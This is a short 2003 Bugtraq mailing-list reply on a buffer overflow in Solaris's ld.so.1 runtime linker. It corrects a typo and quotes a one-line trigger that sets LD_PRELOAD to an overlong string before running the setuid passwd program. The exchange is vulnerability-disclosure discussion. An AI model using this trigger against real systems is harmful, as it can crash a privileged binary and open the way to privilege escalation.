[30953] in bugtraq
Re: Solaris ld.so.1 buffer overflow
daemon@ATHENA.MIT.EDU (Jouko Pynnonen)
Wed Jul 30 13:38:31 2003
Date: Wed, 30 Jul 2003 19:47:42 +0300
From: Jouko Pynnonen <jouko@iki.fi>
To: bugtraq@securityfocus.com
Message-ID: <20030730164742.GE32687@ip212-226-112-140.kestel.pp.fi>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
In-Reply-To: <925B163D3014CB4E95B0C4054D36BC3956CCD2@msnyc2.nyc.deshaw.com>
On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:
> Modify the command (you need to add a trailing slash) to be the following:
>
> LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
>
> and try it again.
That's right, my original message had a typo, the trailing slash was
missing. Thanks for noticing this, David. Without the slash nothing
special happens. My apologies,
--
Jouko Pynnonen http://iki.fi/jouko/
jouko@iki.fi
